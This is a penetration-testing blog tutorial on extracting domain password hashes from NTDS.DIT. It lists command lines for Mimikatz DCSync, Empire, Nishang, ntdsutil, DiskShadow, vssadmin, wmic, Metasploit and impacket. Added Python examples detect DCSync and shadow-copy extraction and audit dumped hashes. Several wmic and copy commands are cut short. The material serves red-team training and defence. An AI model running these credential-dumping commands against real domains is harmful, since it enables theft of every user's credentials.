
Penetration Testing Lab

Dumping Domain Password Hashes

July 4, 2018, by netbiosX, in Post Exploitation. Tags: Active Directory, DCSync, DiskShadow, Empire, Metasploit, Mimikatz, Nishang, NTDS.DIT, Red Team, vssadmin, vssown, WMI

It is very common during penetration tests where domain administrator access has been achieved to extract the password hashes of all the domain users for offline cracking and analysis. These hashes are stored in a database file in the domain controller (NTDS.DIT) with some additional information like group memberships and users.

The NTDS.DIT file is constantly in use by the operating system and therefore cannot be copied directly to another location for extraction of information. This file can be found in the following Windows location:

    C:\Windows\NTDS\NTDS.dit

There are various techniques that can be used to extract this file or the information that is stored inside it; however, the majority of them use one of these methods:

1. Domain Controller Replication Services
2. Native Windows Binaries
3. WMI
Mimikatz

Mimikatz has a feature (dcsync) which utilises the Directory Replication Service (DRS) to retrieve the password hashes from the NTDS.DIT file. This technique eliminates the need to authenticate directly with the domain controller as it can be executed from any system that is part of the domain from the context of a domain administrator. Therefore it is the standard technique for red teams as it is less noisy.

    lsadump::dcsync /domain:pentestlab.local /all /csv

Mimikatz – Dump Domain Hashes via DCSync

By specifying the domain username with the /user parameter Mimikatz can dump all the account information of this particular user including his password hash.

    lsadump::dcsync /domain:pentestlab.local /user:test

Mimikatz – Dump User Hash via DCSync
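DCSync is "less noisy" on the endpoint, but the domain controller still records the replication request as a directory service access (Security event 4662) listing the control access rights it evaluated. The following is an added detection example, not code from the original post: it flags 4662 records whose requested rights are the well-known replication GUIDs and whose subject is not an account expected to replicate. It assumes Directory Service Access auditing is enabled on the DCs; the flattened record layout, the allow-list of replicating accounts and the event lines are constructed for the example.

```python
"""Flag DCSync-style replication requests in Security event 4662 records.
Added example: the three GUIDs are the well-known replication control
access rights; the record layout, allow-list and sample events are
constructed for this example and are not the original post's material.
"""
import re
from typing import Dict, List, Optional, Tuple

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals expected to request replication: DC computer accounts and a
# directory synchronisation service account (assumed names, adjust per domain).
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "MSOL_aadconnect"}

EVENT_RE = re.compile(
    r"EventID=(?P<id>\d+)\s+SubjectUserName=(?P<user>\S+)\s+"
    r"AccessMask=(?P<mask>0x[0-9A-Fa-f]+)\s+Properties=(?P<props>\S+)"
)
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")

def parse_event(line: str) -> Optional[Dict[str, object]]:
    """Extract the 4662 fields needed for the check from one flattened record."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    event: Dict[str, object] = m.groupdict()
    event["guids"] = set(GUID_RE.findall(m.group("props").lower()))
    return event

def replication_rights_requested(event: Dict[str, object]) -> List[str]:
    """Replication rights in the record, if the requester is not expected to replicate."""
    if event["id"] != "4662" or event["user"] in EXPECTED_REPLICATORS:
        return []
    return sorted(REPLICATION_RIGHTS[g] for g in event["guids"] if g in REPLICATION_RIGHTS)

def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (account, rights) for every record that looks like a DCSync request."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        rights = replication_rights_requested(event) if event else []
        if rights:
            alerts.append((event["user"], rights))
    return alerts

# Constructed records: a DC replicating normally, a user account pulling all
# changes (DCSync), and an ordinary object read (user class GUID) that must not fire.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC02$ AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=test AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=jsmith AccessMask=0x10 Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
]
```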
Alternatively, executing Mimikatz directly on the domain controller, password hashes can be dumped via the lsass.exe process.

    privilege::debug
    lsadump::lsa /inject
Mimikatz – Dump Domain Hashes via lsass

The password hashes of the domain users will be retrieved.
Mimikatz – Dump domain hashes via lsadump

Empire

PowerShell Empire has two modules which can retrieve domain hashes via the DCSync attack. Both modules need to be executed from the perspective of a domain administrator and they use Microsoft replication services. These modules rely on the Invoke-Mimikatz PowerShell script in order to execute Mimikatz commands related to DCSync.

The following module will extract the domain hashes in a format similar to the output of the Metasploit hashdump command.

    usemodule credentials/mimikatz/dcsync_hashdump

Empire – DCSync Hashdump Module

The DCSync module requires a user to be specified in order to extract all the account information.

Empire – DCSync Module

The following information will be obtained:

Empire – DCSync Account Information

Nishang

Nishang is a PowerShell framework which enables red teamers and penetration testers to perform offensive operations against systems. The Copy-VSS script can be used to automatically extract the required files: NTDS.DIT, SAM and SYSTEM. The files will be extracted into the current working directory or into any other folder that is specified.

    Import-Module .\Copy-VSS.ps1
    Copy-VSS
    Copy-VSS -DestinationDir C:\ShadowCopy\

Nishang – Extract NTDS PowerShell

Alternatively the script can be executed from an existing Meterpreter session by loading the PowerShell extension.

    load powershell
    powershell_import /root/Copy-VSS.ps1
    powershell_execute Copy-VSS

It is also possible to establish a direct PowerShell session with the command powershell_shell in order to extract the files once the script has been imported into the existing Meterpreter session.

    Copy-VSS
    Copy-VSS -DestinationDir C:\Ninja

Nishang – Extract NTDS Meterpreter PowerShell

PowerSploit

PowerSploit contains a PowerShell script which utilizes the Volume Shadow Copy service to create a new volume that can be used for extraction of files.

    Import-Module .\VolumeShadowCopyTools.ps1
    New-VolumeShadowCopy -Volume C:\
    Get-VolumeShadowCopy

PowerSploit – VolumeShadowCopyTools

Alternatively it can be executed from an existing Meterpreter session by loading the PowerShell extension.

    powershell_shell
    New-VolumeShadowCopy -Volume C:\
    Get-VolumeShadowCopy

PowerSploit – Volume Shadow Copy

Files can then be copied from the new volume to a destination path with the copy command.

Invoke-DCSync

Invoke-DCSync is a PowerShell script that was developed by Nick Landers and leverages PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz to retrieve hashes with the Mimikatz method of DCSync. Executing the function directly will generate the following output:

    Invoke-DCSync

Invoke-DCSync – PowerShell

The results will be formatted into four tables: Domain, User, RID and Hash. However, executing Invoke-DCSync with the parameter -PWDumpFormat will retrieve the hashes in the format: user:id:lm:ntlm:::

    Invoke-DCSync -PWDumpFormat

Invoke-DCSync – PowerShell PWDump Format

The same output can be achieved by running the script from an existing Meterpreter session.

Invoke-DCSync Metasploit

With the PWDumpFormat:

Invoke-DCSync – Metasploit PWDump Format
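As an added example (not code from the original post or from Invoke-DCSync), a small Python parser and audit for the user:id:lm:ntlm::: layout above; the same layout comes out of Metasploit's hashdump and Empire's dcsync_hashdump described earlier, so one offline review covers all of them. The dump lines are constructed, and the two sentinel hashes are the well-known "no LM hash stored" and "empty password" values.

```python
"""Parse and audit a pwdump-format dump (user:id:lm:ntlm:::).
Added example; the sample dump is constructed. The review looks for what
a defender wants before any cracking starts: blank passwords, accounts
that still store an LM hash, and the same NT hash shared by several users.
"""
from collections import defaultdict
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # "no LM hash stored" sentinel
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Constructed sample: a domain prefix on one user, a machine account, a blank
# password, an account still storing an LM hash, and a reused password.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
PENTESTLAB\\test:1104:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy01:1106:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""

def parse_pwdump(text: str) -> List[Dict[str, str]]:
    """Parse pwdump lines; a DOMAIN\\ prefix on the user name is stripped."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"malformed pwdump line: {raw!r}")
        user, rid, lm, nt = fields[0], fields[1], fields[2].lower(), fields[3].lower()
        if len(lm) != 32 or len(nt) != 32 or not all(c in "0123456789abcdef" for c in lm + nt):
            raise ValueError(f"hash is not 16 bytes of hex: {raw!r}")
        records.append({"user": user.rsplit("\\", 1)[-1], "rid": rid, "lm": lm, "nt": nt})
    return records

def audit(records: List[Dict[str, str]]) -> Dict[str, list]:
    """Blank passwords, LM hashes still stored (LM storage not disabled) and
    NT hashes shared between accounts (password reuse). Machine accounts are skipped."""
    findings: Dict[str, list] = {"blank_password": [], "lm_hash_stored": [], "shared_nt_hash": []}
    by_nt = defaultdict(list)
    for r in records:
        if r["user"].endswith("$"):   # machine accounts have random passwords
            continue
        if r["nt"] == EMPTY_NT:
            findings["blank_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    findings["shared_nt_hash"] = [sorted(u) for u in by_nt.values() if len(u) > 1]
    return findings
```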

ntdsutil

ntdsutil is a command line tool that is part of the domain controller ecosystem and its purpose is to enable administrators to access and manage the Windows Active Directory database. However, it can be abused by penetration testers and red teams to take a snapshot of the existing ntds.dit file which can be copied to a new location for offline analysis and extraction of password hashes.

    ntdsutil
    activate instance ntds
    ifm
    create full C:\ntdsutil
    quit
    quit

ntdsutil

Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will be saved in the Active Directory folder and the SAM and SYSTEM files will be saved into the Registry folder.

ntdsutil – ntds

DiskShadow

DiskShadow is a Microsoft signed binary which is used to assist administrators with operations related to the Volume Shadow Copy Service (VSS). Originally bohops wrote about this binary in his blog. This binary has two modes, interactive and script, and therefore a script file can be used that contains all the necessary commands to automate the process of NTDS.DIT extraction. The script file can contain the following lines in order to create a new volume shadow copy, mount a new drive, execute the copy command and delete the volume shadow copy.

    set context persistent nowriters
    add volume c: alias someAlias
    create
    expose %someAlias% z:
    exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds
    delete shadows volume %someAlias%
    reset

It should be noted that the DiskShadow binary needs to be executed from the C:\Windows\System32 path. If it is called from another path the script will not execute correctly.

    diskshadow.exe /s c:\diskshadow.txt

DiskShadow

Running the following command directly from the interpreter will list all the available volume shadow copies of the system.

    diskshadow
    LIST SHADOWS ALL

diskshadow – Retrieve Shadow Copies

The SYSTEM registry hive should be copied as well since it contains the key to decrypt the contents of the NTDS file.

    reg.exe save hklm\system c:\exfil\system.bak

diskshadow – Copy system from Registry

WMI

Sean Metcalf demonstrated in his blog that it is possible to remotely extract the NTDS.DIT and SYSTEM files via WMI. This technique uses the vssadmin binary to create the volume shadow copy.

    wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!

WMI – Create Volume Shadow Copy

Then it executes the copy command remotely in order to extract the NTDS.DIT file from the volume shadow copy into another directory on the target system.

    wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!

WMI – Copy NTDS File

The same applies for the SYSTEM file.

    wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!

WMI – Copy System File

The extracted files can then be transferred from the domain controller to another Windows system for dumping the domain password hashes.

    PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\ntds.dit
    PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.h

Transfer Files via Copy

Instead of credentials, if a Golden Ticket has been generated it can be used for authentication with the domain controller via Kerberos.

vssadmin

vssadmin (the volume shadow copy utility) is a Windows command line utility which enables administrators to take backups of computers, volumes and files even if they are in use by the operating system. Volume Shadow Copy runs as a service and requires the filesystem to be formatted as NTFS, which all modern operating systems are by default. From a Windows command prompt, executing the following will create a snapshot of the C: drive so that files that are not normally accessible by the user can be copied to another location (local folder, network folder or removable media).

    vssadmin create shadow /for=C:

vssadmin – Create Volume Shadow Copy

Since all the files in the C: drive have been copied into another location (HarddiskVolumeShadowCopy1) they are not directly used by the operating system and therefore can be accessed and copied to another location. The copy command will copy the NTDS.DIT and SYSTEM files to a newly created folder on the local drive named ShadowCopy.

    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\

Copy Files from Volume Shadow Copy

These files need to be copied from the domain controller to another host for further processing.

ShadowCopy – Files

vssown

Similar to the vssadmin utility, Tim Tomes developed vssown, which is a Visual Basic script that can create and delete volume shadow copies, run arbitrary executables from an unmounted shadow copy and start and stop the volume shadow copy service.

    cscript vssown.vbs /start
    cscript vssown.vbs /create c
    cscript vssown.vbs /list
    cscript vssown.vbs /delete

vssown – Volume Shadow Copy

The required files can be copied with the copy command.

    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\

vssown – Copy NTDS, SYSTEM and SAM Files
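From a detection standpoint, each of the native methods above (ntdsutil ifm, DiskShadow scripts, the reg.exe hive export, vssadmin, vssown.vbs and copies out of a HarddiskVolumeShadowCopy path) leaves a distinctive process command line on the domain controller. The following added Python example (not code from the original post) runs such rules over constructed process-creation records; the flat Image | User | CommandLine layout is an assumption to map onto Sysmon event 1 or Security event 4688 fields.

```python
"""Process-creation rules for the shadow-copy based NTDS.DIT extraction
methods (ntdsutil ifm, DiskShadow scripts, reg.exe hive export, vssadmin,
vssown.vbs and copies from a shadow volume). Added example; the record
layout and the sample log lines are constructed for this example.
"""
import re
from typing import Dict, List, Tuple

# (rule name, image pattern, command-line pattern); all matched case-insensitively
RULES: List[Tuple[str, str, str]] = [
    ("ntdsutil IFM snapshot",    r"\\ntdsutil\.exe$",   r"\bifm\b|create\s+full"),
    ("vssadmin shadow creation", r"\\vssadmin\.exe$",   r"create\s+shadow"),
    ("diskshadow scripted run",  r"\\diskshadow\.exe$", r"/s\s+\S+"),
    ("vssown.vbs usage",         r"\\cscript\.exe$",    r"vssown\.vbs"),
    ("registry hive export",     r"\\reg\.exe$",        r"\bsave\b.*hklm\\(system|sam)\b"),
    ("copy from shadow volume",  r".",                  r"harddiskvolumeshadowcopy\d+.*(ntds\.dit|\\system\b|\\sam\b)"),
]

def parse_event(line: str) -> Dict[str, str]:
    """Split 'Key=value | Key=value' into a dict; the first '=' separates key from value."""
    event: Dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        event[key.strip()] = value.strip()
    return event

def match_rules(event: Dict[str, str]) -> List[str]:
    """Names of every rule whose image and command-line patterns both match."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    return [name for name, img_pat, cmd_pat in RULES
            if re.search(img_pat, image) and re.search(cmd_pat, cmd)]

def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (user, rule name) for every record that matches a rule."""
    alerts: List[Tuple[str, str]] = []
    for line in lines:
        event = parse_event(line)
        alerts.extend((event.get("User", "?"), name) for name in match_rules(event))
    return alerts

# Constructed records; the 'vssadmin list shadows' line is benign and must not fire.
SAMPLE_LOG = [
    "Image=C:\\Windows\\System32\\ntdsutil.exe | User=PENTESTLAB\\David | CommandLine=ntdsutil \"activate instance ntds\" ifm \"create full C:\\ntdsutil\" quit quit",
    "Image=C:\\Windows\\System32\\vssadmin.exe | User=PENTESTLAB\\David | CommandLine=vssadmin create shadow /for=C:",
    "Image=C:\\Windows\\System32\\diskshadow.exe | User=NT AUTHORITY\\SYSTEM | CommandLine=diskshadow.exe /s c:\\diskshadow.txt",
    "Image=C:\\Windows\\System32\\cmd.exe | User=PENTESTLAB\\David | CommandLine=cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit C:\\exfil\\",
    "Image=C:\\Windows\\System32\\reg.exe | User=PENTESTLAB\\David | CommandLine=reg.exe save hklm\\system c:\\exfil\\system.bak",
    "Image=C:\\Windows\\System32\\vssadmin.exe | User=NT AUTHORITY\\SYSTEM | CommandLine=vssadmin list shadows",
    "Image=C:\\Windows\\System32\\cscript.exe | User=PENTESTLAB\\David | CommandLine=cscript vssown.vbs /create c",
]
```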

Metasploit

The Metasploit framework has a module which authenticates directly with the domain controller via the Server Message Block (SMB) service, creates a volume shadow copy of the system drive and downloads copies of the NTDS.DIT and SYSTEM hive into the Metasploit directories. These files can be used with other tools like impacket that can perform extraction of Active Directory password hashes.

    auxiliary/admin/smb/psexec_ntdsgrab

Metasploit – NTDS Module

There is also a post exploitation module which can be linked into an existing Meterpreter session in order to retrieve domain hashes via the ntdsutil method.

    windows/gather/credentials/domain_hashdump

Alternatively, if there is an existing Meterpreter session to the domain controller the command hashdump can be used. However, this method is not considered safe as it might crash the domain controller.

    hashdump

Metasploit – Hashdump on DC

fgdump

fgdump is an old executable file which can extract LanMan and NTLM password hashes. It can be executed locally or remotely if local administrator credentials have been acquired. During execution fgdump will attempt to disable the antivirus that might run on the system and, if it is successful, will write all the data into two files. If there is an antivirus or an endpoint solution fgdump should not be used as a method of dumping password hashes to avoid detection, since it is flagged by most antivirus companies including Microsoft's Windows Defender.

    fgdump.exe

fgdump – Domain Controller

The password hashes can be retrieved by examining the contents of the .pwdump file.

    type 127.0.0.1.pwdump

fgdump – pwdump File

NTDS Extraction

Impacket is a collection of Python scripts that can be used to perform various tasks including extraction of the contents of the NTDS file. The impacket-secretsdump module requires the SYSTEM hive and the NTDS database file.

    impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit

impacket – Extract NTDS Contents

Furthermore impacket can dump the domain password hashes remotely from the NTDS.DIT file by using the computer account and its hash for authentication.

    impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee

impacket – Extract NTDS Contents Remotely

As an alternative solution to impacket, the NTDSDumpEx binary can extract the domain password hashes from a Windows host.

    NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

NTDSDumpEx

There is also a shell script, adXtract, that can export the usernames and password hashes into a format that can be used by common password crackers such as John the Ripper and Hashcat.

    ./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab

adXtract

The script will write all the information into various files under the project name and, when the decryption of the NTDS database file is finished, will print the list of users and password hashes to the console. The script provides extensive information regarding the domain users, as demonstrated below.

adXtract – List of Users

The password hashes will be presented in the following format.